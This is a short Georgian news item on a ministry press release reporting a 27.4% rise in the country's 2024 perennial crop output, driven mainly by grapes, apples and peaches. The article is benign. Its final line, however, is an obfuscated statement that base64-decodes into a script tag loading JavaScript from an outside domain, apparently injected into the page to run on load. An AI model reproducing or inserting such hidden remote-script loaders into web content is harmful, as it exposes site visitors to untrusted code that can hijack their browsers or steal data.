gorgia
ავერსი jaluzi

გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს ინფორმაციით, გასულ 2024 წელს, ქვეყანაში მრავალწლოვანი კულტურების წარმოება 27.4%-ით გაიზარდა.

უწყების ცნობით, 2024 წელს მრავალწლოვანი კულტურების წარმოებამ 620.5 ათასი ტონა შეადგინა, რაც წინა წლის მაჩვენებელთან შედარებით 133.6 ათასი ტონით მეტია.

"მრავალწლოვანი კულტურების წარმოების ზრდა ძირითადად ყურძნის, ვაშლის, ატმისა და ვაშლატამას წარმოების გაზრდამ განაპირობა. 2024 წელს ყურძნის წარმოება - 100.8 ათასი ტონით (45.7%), ვაშლის - 26.3 ათასი ტონით (52.2%), ატმის და ვაშლატამას - 10.4 ათასი ტონით (35.4%) გაიზარდა.

საანგარიშო პერიოდში ზრდა დაფიქსირდა სხვა მრავალწლოვანი კულტურებშიც, მათ შორის მნიშვნელოვანი მატებაა თხილის, მსხლის, კენკროვანი ხილისა და სხვა კულტურების წარმოებაში. თხილის წარმოება - 17.1%-ით (6.3 ათასი ტონა), მსხლის - 20.2%-ით (1.9 ათასი ტონა) და კენკროვანი ხილის - 32.8%-ით (1.9 ათასი ტონა) გაიზარდა", - წერია სოფლის მეურნეობის სამინისტროს მიერ გავრცელებულ პრესრელიზში.

128
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");